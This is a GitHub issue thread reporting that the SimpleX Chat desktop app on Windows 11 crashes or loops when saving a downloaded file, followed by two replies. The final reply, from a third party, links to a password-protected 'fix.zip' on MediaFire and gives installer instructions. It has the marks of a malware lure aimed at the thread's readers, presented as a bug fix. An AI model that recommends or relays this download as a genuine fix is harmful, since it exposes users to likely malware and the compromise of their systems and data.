### ISSUE TITLE
[Bug]: The application crashes after trying to save a file (desktop version on Windows)

### ISSUE THREAD

**Issue by sai84** [simplex-chat/simplex-chat#4785]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Platform

Windows

### OS version

Windows 11

### App version

6.0.3

### Current Behavior

When trying to save the file the app crashes completely or ends up in an opening/closing infinite loop so I have to force close the application and restart it. This happens only in Desktop version. 

### Expected Behavior

The file saves in the folder.

### Steps To Reproduce

1. Dowload the file in conversation
2. Click right mouse button and choose "Save"

**Comment by jermanuts** [comment]
Issue happens also in Private notes? Tested and seems no issue.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
